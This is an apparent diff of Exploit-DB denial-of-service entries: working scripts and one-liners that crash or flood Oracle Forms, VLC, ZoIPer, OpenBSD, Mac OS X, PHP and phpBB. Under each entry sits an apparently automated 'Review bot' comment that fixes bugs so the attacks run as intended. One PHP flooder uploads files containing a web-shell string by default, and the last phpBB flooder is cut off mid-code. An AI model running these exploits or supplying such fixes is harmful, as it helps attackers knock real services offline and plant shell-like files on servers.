Warrior Kings: Battles is susceptible to a remote denial of service vulnerability. This is due to a failure of the game server to properly handle exceptional conditions.
This vulnerability allows remote attackers to crash affected game servers, denying access to legitimate users.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25692.zip

View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/15039/info
Oracle Forms is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.
By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.
This issue was reported in Oracle Forms versions prior to July 2005.
This issue was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a separate BID.
http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES
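Review bot: the request on the last line of the hunk buries the actual trigger, the connect descriptor `(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER))` passed in through the `userid=` parameter, among a dozen unrelated servlet parameters, and the description never says that this is the mechanism. Call it out, and mark `SCOTT/TIGER`, `test.fmx`, `HOST=server` and `www.example.com:8888` as placeholders that need a valid database account, an existing form and the real listener host, because as written the line looks like a ready-to-run URL.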

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31140/info
Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation.
An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users.
This issue affects Unreal Engine 3; other versions may also be affected.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32362.zip

View file

@ -0,0 +1,38 @@
# Exploit Title: JourneyMap Disk-space consumption exploit
# Date: 23Nov2014
# Exploit Author: CovertCodes
# Vendor Homepage: http://journeymap.techbrew.net/
# Software Link: http://journeymap.techbrew.net/download/
# Version: 5.0.0RC2 Ultimate Edition
# Tested on: Linux
JourneyMap (http://journeymap.techbrew.net/) is a mapping mod for
Minecraft. It comes included with some modpacks, and is enabled by
default in the popular Feed the Beast client. JourneyMap opens a web
server on the client which is configured to listen on port 8080. When
the client is running, a remote, unauthenticated user can have
JourneyMap save a screenshot of the game to the hard drive by accessing
a specific URL, consuming hard drive space. Here's an example:
#!/bin/bash
while true;
do
curl -o /dev/null 192.168.1.1:8080/action?type=savemap&mapType=day
done
This works even when the client has paused the game (by pressing
escape.) We include mapType=day because the software should refuse to
save a screenshot if the client user is underground, and the game is set
on hardcore mode.
Accessing the URL and triggering a screenshot will display a message
on the client's screen, which may somewhat lessen the severity of this
exploit. Further, it takes a long time to fill up disk using this
technique. JourneyMap allows depth and resolution to be specified in
the URL as well, though a few simple tests showed no change despite
altering these parameters. If one were able to increase the depth and
resolution of the image, the drive would fill up faster.
Tested with JourneyMap 5.0.0RC2 Ultimate Edition, but presumed to
work on other versions as well.
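Review bot: the shell loop in the hunk does not send the URL it claims to: the `&` in `curl -o /dev/null 192.168.1.1:8080/action?type=savemap&mapType=day` is unquoted, so the shell backgrounds `curl -o /dev/null 192.168.1.1:8080/action?type=savemap` and treats `mapType=day` as a separate variable assignment. The `mapType=day` parameter the text says is needed for underground/hardcore targets never reaches the server, and the loop spawns an unbounded number of background curls instead of serial requests. Quote the URL: `curl -o /dev/null '192.168.1.1:8080/action?type=savemap&mapType=day'`, and say that `192.168.1.1` is a placeholder for the client running JourneyMap.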

58
platforms/multiple/dos/35465.pl Executable file
View file

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/46868/info
VLC Media Player is prone to a denial-of-service vulnerability.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
VLC Media Player 1.0.5 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : VLC media player v1.0.5 (.ape) Local Crash PoC
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : VLC media player Just Crashed
# Tested on : Windows XP SP3 Fran<61>ais
# Target : VLC media player v1.0.5
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat APE file ( Monkey's Audio Format )
# => 2 - Open APE file With VLC 1.0.5
# => 3 - Crashed !!!
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |===========================================================|\n";
print " |= [!] Name : VLC media player v1.0.5 (Monkey's File) =|\n";
print " |= [!] Exploit : Local Crash PoC =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |===========================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
# Greets All My Friends (cit<69> 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
# ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers .
# ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker .
#===============================================================================
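Review bot: the error handling in the Perl hunk checks the wrong call: `open(file , ">", "Kedans.ape");` is unchecked, and the `or die` on the following line is attached to `print "\n [+] File successfully created!\n"`, which prints to STDOUT and essentially never fails, so a failed open still reports success. Use `open(my $fh, '>', 'Kedans.ape') or die "open: $!";` followed by `binmode($fh);` before writing the header bytes, since the target is Windows and the file is binary. The comment `# Evil File APE (16 bytes) 4.0 KB` also contradicts itself; `$PoC` is 16 bytes.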

70
platforms/multiple/dos/9987.txt Executable file
View file

@ -0,0 +1,70 @@
#!/usr/bin/python
# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09
import sys
import socket
import os
def main(argc , argv):
if len(sys.argv) != 2:
os.system("cls")
sys.exit("Usage: " + sys.argv[0] + " <target_ip>\n")
target_host = sys.argv[1]
target_port = 5060
evil_packet = "\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\
"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\
"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\
"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\
"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\
"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\
"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\
"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\
"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\
"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\
"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\
"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\
"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\
"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\
"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\
"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\
"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\
"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\
"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\
"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\
"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\
"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\
"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\
"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"
os.system("cls")
print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n"
print "[+] Exploited By Gr33n_G0bL1n\r\n"
print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((target_host,target_port))
print "[+] Trying To Send Evil Packet...\r\n"
s.sendall(evil_packet)
s.close()
print "[+] Done!\r\n"
except:
print "[x] Connection Error!\r\n"
if (__name__ == "__main__"):
sys.exit(main(len(sys.argv), sys.argv))
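Review bot: the trigger in the Python hunk is invisible as written: the one header that matters, an empty `Call-Info:` (bytes `\x43\x61\x6c\x6c\x2d\x49\x6e\x66\x6f\x3a\x20\x20\x0d\x0a`, i.e. `Call-Info:  \r\n`), is buried inside a 24-line hex blob of an otherwise ordinary INVITE. Build `evil_packet` as readable SIP text and keep only the trigger as escaped bytes, so a reader can see what the `# Bad Chars: \x20 , \x09` comment refers to. The message also advertises `Content-Length: 125` and then sends no body, which should be stated as intentional or fixed; `main(argc , argv)` ignores both parameters and re-reads `sys.argv`; and `os.system("cls")` is cmd.exe-only although the header says it was tested on Ubuntu 8.10.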

7
platforms/novell/dos/19541.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/700/info
Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable to a remotely exploitable vulnerability which could cause a denial of service. The client opens a listening tcp socket on port 427, to which if a SYN is sent, results in the machine locking with a "blue screen" error. The only solution from that point is to reset the affected computer.
nmap -sS -p 427 <target>
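Review bot: `nmap -sS` needs raw-socket (root) privileges, and the write-up says a single SYN is enough, so any ordinary connect attempt to port 427 (a plain `nc <target> 427`, or a routine port scan) triggers the same blue screen; say so, since it makes the affected clients a hazard to scan at all.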

129
platforms/openbsd/dos/21167.c Executable file
@ -0,0 +1,129 @@
source: http://www.securityfocus.com/bid/3612/info
OpenBSD is a freely available implementation of the BSD Operating System. It is based on the NetBSD implementation.
Under some conditions, an application launched by a regular user on the system can cause a system crash. When an application on an OpenBSD system attempts to pipe a NULL value, a fault in the kernel causes the system to crash immediately.
This make it possible for a malicious local user to deny service to legitimate users of the system.
/* obsd-crashme.c - by Marco Peereboom <marcodsl@swbell.net> */
/* December 03, 2001 */
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>
#include <signal.h>
#include <stdarg.h>
#include <syslog.h>
/* globals */
int fd[8]; /* temp pipe file descriptors */
int fd_real[4]; /* real pipe's */
static int __DEBUG__ = 0;
static int __SYSLOG__ = 0;
void enable_debug(void)
{
__DEBUG__ = 1;
}
void disable_debug(void)
{
__DEBUG__ = 0;
}
void enable_syslog(void)
{
__SYSLOG__ = 1;
}
void disable_syslog(void)
{
__SYSLOG__ = 0;
}
void s_fprintf(FILE *file, const char *fmt, ...)
{
va_list ap;
if (__DEBUG__) {
fflush(file);
va_start(ap, fmt);
vfprintf(file, fmt, ap);
va_end(ap);
fflush(file);
}
if (__SYSLOG__) {
va_start(ap, fmt);
vsyslog(LOG_INFO, fmt, ap);
va_end(ap);
}
}
void *s_malloc(size_t size)
{
char serr[40]; /* can not allocate more mem so lets use this
ugly beast */
void *p;
if (__DEBUG__ || __SYSLOG__) {
s_fprintf(stderr, "PID=%-5i PPID=%-5i: malloc(%i)\n",
getpid(), getppid(), size);
}
if ((p = malloc(size)) == NULL ) {
sprintf(serr,"PID=%i, Could not allocate memory",
getpid());
perror(serr);
exit(6);
}
return p;
}
void s_perror(const char *str)
{
char *buf;
if (__DEBUG__ || __SYSLOG__) {
s_fprintf(stderr, "PID=%-5i PPID=%-5i: perror(%s)\n",
getpid(), getppid(), str);
}
buf = s_malloc(11 + strlen(str)); /* PID=%-5i = 11 chars */
sprintf(buf, "PID=%-5i %s", getpid(), str);
perror(buf);
free(buf);
}
void s_pipe(int *fd)
{
if (__DEBUG__ || __SYSLOG__) {
s_fprintf(stderr, "PID=%-5i PPID=%-5i: pipe(%x)\n",
getpid(), getppid(), (unsigned int)fd);
}
if (pipe(fd) == -1)
{
s_perror("Could not create pipe");
exit(3);
}
}
int main(int argc, char **argv)
{
enable_debug();
enable_syslog();
fprintf(stderr, "Before pipe\n");
s_pipe(NULL); /* test if s_pipe exits */
fprintf(stderr, "Will never reach this\n");
return 0;
}
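Review bot: s_perror() calls strlen() at `buf = s_malloc(11 + strlen(str));` but the file never includes <string.h>, so it builds only through an implicit declaration (an error on current compilers); add the include. Two smaller points: `s_fprintf(stderr, "PID=%-5i PPID=%-5i: malloc(%i)\n", ..., size)` passes a size_t to %i, and `(unsigned int)fd` in s_pipe() truncates the pointer on 64-bit targets; use %zu and %p. The trigger itself, `s_pipe(NULL)`, is intended, and the comment `/* test if s_pipe exits */` undersells it: the point of the PoC is that the kernel faults on the NULL fd array instead of returning EFAULT, so say that in the comment.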

44
platforms/openbsd/dos/24181.sh Executable file
@ -0,0 +1,44 @@
source: http://www.securityfocus.com/bid/10496/info
It is reported that OpenBSD's isakmpd daemon is susceptible to a remote denial of service vulnerability.
An attacker is able to delete security associations and policies from IPSec VPN's by sending a malformed UDP ISAKMP packet to a vulnerable server. The malformed packet contains payloads for both setting up a new tunnel and deleting a tunnel. Isakmpd improperly acts upon the delete payload and terminates the associations and policys relating to the tunnel.
It is possible to destroy security associations, effectively eliminating the VPN connection between gateways, denying service to legitimate users of the VPN.
#!/bin/sh
if [ ! $# -eq 3 ]; then
echo "usage: $0 fake_src victim spi";
exit;
fi
src=$1; dst=$2
spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`
dnet hex \
$cky_i \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x08\x10\x05\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x5c" \
"\x01\x00\x00\x04" \
"\x0c\x00\x00\x2c" \
"\x00\x00\x00\x01" \
"\x00\x00\x00\x01" \
"\x00\x00\x00\x20" \
"\x01\x01\x00\x01" \
"\x00\x00\x00\x18" \
"\x00\x01\x00\x00" \
"\x80\x01\x00\x05" \
"\x80\x02\x00\x02" \
"\x80\x03\x00\x01" \
"\x80\x04\x00\x02" \
"\x00\x00\x00\x10" \
"\x00\x00\x00\x01" \
"\x03\x04\x00\x01" \
$spi |
dnet udp sport 500 dport 500 |
dnet ip proto udp src $src dst $dst |
dnet send
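Review bot: `cky_i` is filled with raw bytes from /dev/urandom and then handed to `dnet hex` alongside `\x`-escaped strings, but a shell variable cannot hold NUL bytes and raw backslashes will be taken as escape prefixes, so the initiator cookie is shortened or mangled. Hex-encode it the way `spi` is encoded: pipe the dd output through `od -An -tx1 | tr -d ' \n'` and then the same sed substitution used on line `spi=...`. Also document the SPI format: the ISAKMP length (`\x00\x00\x00\x5c`, 92 bytes), the Delete payload length (`\x00\x00\x00\x10`) and its header (`\x03\x04\x00\x01`: protocol ESP, SPI size 4, one SPI) are all hardcoded, so `$3` must be exactly 8 hex digits; the usage line should say so and the script should check it before sending.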

14
platforms/osx/dos/20845.txt Executable file
@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/2716/info
Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections.
It is possible to log in remotely to the server and shut down the service by making a directory with a name that is 65 characters long. Users must be authenticated to engage this attack.
ftp host
user anonymous
pass anonymous
mkdir
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa
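Review bot: the write-up says `Users must be authenticated to engage this attack`, yet the steps log in as anonymous/anonymous; either state that an anonymous login is sufficient where the server allows it, or show the step with a real account. Also the mkdir argument has been wrapped onto a separate line (and split in two) by the rendering; make clear it is a single 65-character name on the mkdir command line, otherwise a reader pasting the lines sends `mkdir` with no argument followed by two junk commands.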

7
platforms/osx/dos/22074.txt Executable file
@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/6331/info
Mac OS X is the BSD-derived operating system distributed and maintained by Apple Sofware.
It has been reported that a denial of service exists in OS X. When a user creates a directory, descends it, creates another directory of the same name, then attempts to move the directory up one level in the hierarchy, the system reacts unpredictably. It has been reported that this can cause a crash of the system.
mkdir ~/mydir; cd ~/mydir; mkdir mydir; mv mydir ..
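Review bot: `mv mydir ..` issued from inside ~/mydir asks the kernel to rename ~/mydir/mydir onto ~/mydir, that is, over its own parent and the process's current directory; the description's "move the directory up one level" hides that this is the unusual case being exercised. Spell it out, and note that because the reported outcome is a system crash the one-liner belongs on a scratch machine.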

48
platforms/osx/dos/9845.c Executable file
@ -0,0 +1,48 @@
/*
Mac OS X 10.5.6-10.6.1 ptrace() mutex handling DoS
==================================================
This code should be run in a loop and due to problems
with mutex handling in ptrace a DoS can occur when a
destroyed mutex is attempted to be interlocked by OSX
kernel giving rise to a race condition. You may need
to run this code multiple times.
- Tested against 10.5.6
- Tested against 10.5.7
- Tested against 10.6.1
while `true`;do ./prdelka-vs-APPLE-ptracepanic;done
-- prdelka
*/
#include <sys/types.h>
#include <sys/ptrace.h>
#include <stdio.h>
#include <stdlib.h>
int main(){
pid_t pid;
char *argv[] = {"id","","",0};
char *envp[] = {"",0};
pid = fork();
if(pid == 0){
usleep(100);
execve("/usr/bin/id",argv,envp);
}
else{
usleep(820);
if(ptrace(PT_ATTACH,pid,0,0)==0){
printf("[ PID: %d has been caught!\n",pid);
if(ptrace(PT_DETACH,pid,0,0)<0){
perror("Evil happens.");
}
usleep(1);
wait(0);
}
else{
perror("Fail!");
}
}
return(0);
}
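Review bot: usleep() and wait() are used without <unistd.h> and <sys/wait.h>, so the file builds only via implicit declarations; add both includes. The parent's `usleep(820)` is a fixed guess at when the child sits between fork() and execve(), which is why the header says to run it in a loop; the comment should say the window is timing dependent and that the 100/820 microsecond values may need tuning per machine. Minor: `char *argv[] = {"id","","",0};` passes two empty arguments to /usr/bin/id for no reason, and the child should `_exit()` if execve() fails instead of falling through to `return(0)`.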

173
platforms/php/dos/10242.txt Executable file
@ -0,0 +1,173 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Author:
# Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20
# http://www.pardus.org.tr/eng/
#
# Credits:
# Bogdan Calin from Acunetix
#
# Description:
# Exploit to cause denial of service on any host that runs PHP via temporary
# file exhaustion. It doesn't matter whether the script handles uploads or not.
# If host runs PHP, it is enough to cause DoS using any PHP script it serves.
#
# This is the implementation of disclosed vulnerability that was found
# by Bogdan Calin. See: http://www.acunetix.com/blog/websecuritynews/php-multipartform-data-denial-of-service/
#
# Affected versions:
# All PHP versions before PHP 5.3.1 and unpatched 5.2.11
#
# Platforms:
# Windows, Linux, Mac
#
# Fix:
# Update to 5.3.1. If you use 5.2.11 and can't update, apply the patch [0]:
#
# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/rfc1867.c?r1=272374&r2=289990&view=patch (introduce max_file_upload)
# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c?r1=289214&r2=289990&view=patch (NOTE: upstream changed 100 to 20, do it so)
#
# Usage:
# python php-multipart-dos.py <site> <port> </index.php> <num of child: optional>
#
# After opening childs, you may wait long for threads to finish because sending such a huge data is painful.
# However, it's not important to finish the request. Openining lots of connections and sending huge data fastly will enough to cause DoS.
# So the more threads you spawn, the more impact you will make. In normal cases, spawning 150 childs would be enough. But the number depends on you.
# Trial and error ;))
#
# Example:
# python php-multipart-dos.py www.example.com 8080 /index.php
#
# By defalt, the program will create 100 threads, each thread will send 10 requests.
# You can specify child number to create, you may want to increase or decrease for the impact, etc..
#
# python php-multipart-dos.py www.example.com 80 /~user/index.php 50
#
# Notes:
# This script is for educational purposes only. Use it at your OWN risk!
import socket
import random
import time
import threading
import sys
class Connection:
def __init__(self, host, port):
self._host = host
self._port = port
self.sock = None
def connect(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self._host, self._port))
def send(self, msg):
if not self.sock:
raise "NotConnected"
else:
self.sock.send(msg)
def close(self):
self.sock.close()
class Exploit (threading.Thread):
def __init__(self, host, port, target):
self._host = host
self._port = port
self._target = target
threading.Thread.__init__(self)
def getBoundary(self):
""" Return random boundary data """
random.seed()
rnd = random.randrange(100000, 100000000)
data = "---------------------------%s" % rnd
return data
def createPayload(self):
data = """POST %(target)s HTTP/1.1\r
Host: %(host)s\r
Uset-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\r
Connection: keep-alive\r
Content-Type: multipart/form-data; boundary=%(boundary)s\r
Content-Length: %(length)s\r\n\r\n"""
boundary = self.getBoundary()
# Create a number of upload data, 16.000, yeah! :)
for i in range(16000):
data += "--%s\r\n" % boundary
data += """Content-Disposition: form-data; name="file_%s"; filename="file_%s.txt"\r
Content-Type: text/plain\r\n
Lorem ipsum dolor sit amet, consectetur adipiscing elit. In non blandit augue.\n\r\n""" % (i, i)
data += "--%s--\r\n" % boundary
return data % {"host": self._host, "target": self._target, "boundary": boundary, "length": str(len(data))}
def run(self):
payload = self.createPayload()
for i in range(0, 10):
c = Connection(self._host, self._port)
c.connect()
c.send(payload)
c.close()
sys.exit(0)
del payload
sys.exit(0)
def usage():
usage_data = """
__^__ __^__
( ___ )------------------------------------------------( ___ )
| / | | \ |
| / | Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20 | \ |
| / | http://www.pardus.org.tr/eng/ | \ |
|___| |___|
(_____)------------------------------------------------(_____)
PHP denial of service exploit via temporary file exhaustion
Usage: python php-multipart-dos.py <host> <port> </adress/index.php> <child number: optional>
See source code for more information
"""
print usage_data
if __name__ == '__main__':
if not len(sys.argv) >= 4:
usage()
else:
# is child number passed?
if len(sys.argv) >= 5:
child = int(sys.argv[4])
else:
child = 100
print "[+] Attack started..."
for i in range(0, child):
try:
exp = Exploit(str(sys.argv[1]), int(sys.argv[2]), str(sys.argv[3]))
exp.start()
print "[+] Opening %s childs... [%s]\r" % (child, i+1),
sys.stdout.flush()
i += 1
except KeyboardInterrupt:
print "\n[-] Keyboard Interrupt. Exiting..."
sys.exit(1)
# print it so that previous "Opening childs..." is still there
print ""
while True:
try:
activeChilds = threading.activeCount()
print "[+] Waiting for childs to finish. %d remaining...\r" % activeChilds,
sys.stdout.flush()
# we have one main process
if activeChilds == 1:
print "\nOK!"
sys.exit(0)
except KeyboardInterrupt:
print "\n[-] Exiting without waiting!"
sys.exit(1)
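Review bot: run() never sends the ten requests the header promises: the `sys.exit(0)` inside `for i in range(0, 10):` ends the thread after its first connection (SystemExit only unwinds that thread), so each child sends exactly one request; drop that line or fix the comment. createPayload() also computes `Content-Length` as `len(data)` over the whole request template, header lines and unexpanded `%(host)s` placeholders included, rather than over the body, so the declared length overshoots the body by the size of the header block; build the body first and take its length. Smaller points: `raise "NotConnected"` raises a string, which is a TypeError on Python 2.6 and later (use an Exception subclass), and the `Uset-Agent` header name is a typo.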

112
platforms/php/dos/10243.txt Executable file
@ -0,0 +1,112 @@
#!/usr/bin/python
# PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009
# Bogdan Calin (bogdan@acunetix.com)
#
import httplib, urllib, sys, string, threading
from string import replace
from urlparse import urlparse
def usage():
print "****************************************************************************"
print " PHP MultiPart Form-Data Denial of Service proof of concept"
print " Bogdan Calin (bogdan@acunetix.com)"
print ""
print " Usage: php_mpfd_dos.py url [number_of_threads] [number_of_files] [data]"
print ""
print " [number_of_threads] - optional, default 10"
print " [number_of_files] - optional, default 15000"
print " [data] - content of the files, by default it will create files containing"
print " the string <?php eval($_REQUEST[x]); ?>"
print ""
print " Example: php_mpfd_dos.py http://ubuntu/index.php"
print "****************************************************************************"
class PhpMPFDDosThread ( threading.Thread ):
# Override Thread's __init__ method to accept the parameters needed:
def __init__ ( self, host, path, files ):
self.host = host
self.path = path
self.files = files
threading.Thread.__init__ ( self )
# run in loop
def run(self):
while(1):
try:
self.post_data()
except:
print "*",
# post multipart_formdata
def post_data(self):
content_type, body = self.encode_multipart_formdata()
h = httplib.HTTPConnection(self.host)
headers = {
'User-Agent': 'Opera/9.20 (php_mpfd_dos;poc)',
'Accept': '*/*',
'Content-Type': content_type
}
h.request('POST', self.path, body, headers)
print ".",
# encode multipart_formdata
def encode_multipart_formdata(self):
"""
adapted from http://code.activestate.com/recipes/146306/
files is a sequence of (name, filename, value) elements for data to be uploaded as files
Return (content_type, body) ready for httplib.HTTP instance
"""
BOUNDARY = '----------PHP_MPFD_DOS'
CRLF = '\r\n'
L = []
for (key, filename, value) in self.files:
L.append('--' + BOUNDARY)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
L.append('Content-Type: application/octet-stream')
L.append('')
L.append(value)
L.append('--' + BOUNDARY + '--')
L.append('')
body = CRLF.join(L)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def main():
if len(sys.argv)<=1:
usage()
sys.exit()
# default values
number_of_threads = 10
number_of_files = 15000
data = "<?php eval($_REQUEST[x]); ?>"
if len(sys.argv)>2:
number_of_threads = int(sys.argv[2])
if len(sys.argv)>3:
number_of_files = int(sys.argv[3])
if len(sys.argv)>4:
data = sys.argv[4]
url = sys.argv[1]
print "[-] target: " + url
# parse target url
up = urlparse(url)
host = up.netloc
path = up.path
# prepare files
files = []
for i in range(0, number_of_files):
files.append(('fu[]', 'f'+str(i), data))
# start the threads
for x in xrange ( number_of_threads ):
PhpMPFDDosThread(host, path, files).start()
if __name__ == '__main__':
main()
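Review bot: the default file content `data = "<?php eval($_REQUEST[x]); ?>"` has nothing to do with temporary-file exhaustion and leaves thousands of web-shell-shaped files in the target's upload tmp directory; default to inert text and leave an eval() payload to whoever passes `[data]` explicitly, or explain in the usage text why it is there. Also the worker's `except: print "*",` swallows every error, including connection refused, so a thread against a dead host spins forever in `while(1)`; catch the specific socket error, back off, and leave the loop after a few failures. `urllib` and `string` are imported but never used.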

146
platforms/php/dos/1063.pl Executable file
@ -0,0 +1,146 @@
#!/usr/bin/perl
## Name: NsT-phpBBDoS (Perl Version)
## Copyright: Neo Security Team
## Author: HaCkZaTaN
## Ported: g30rg3_x
## Date: 20/06/05
## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x
## A Simple phpBB Registration And Search DoS Flooder.
##
## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
## [+]
## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
## [+] ported to Perl By g30rg3_x
## [+] Neo Security Team
## [+]
## [+] Host |without http://www.| victimshost.com
## [+] Path |example. /phpBB2/ or /| /phpBB2/
## [+] Flood Type |1=Registration 2=Search| 1
## [+] ..........................................................
## [+] ..........................................................
## [+] ..........................................................
## [+] ..............................................
## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed
## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"
use IO::Socket;
## Initialized X
$x = 0;
## Flood Variables Provided By User
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
);
print q(Host |without http://www.| );
$host = <STDIN>;
chop ($host);
print q(Path |example. /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);
print q(Flood Type |1 = Registration, 2 = Search| );
$type = <STDIN>;
chop ($type);
## If Type Is Equals To 1 or Registration
if($type == 1){
## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Building User in base X
$uname = "username=NsT__" . "$x";
## Building User Mail in base X
$umail = "&email=NsT__" . "$x";
## Final String to Send
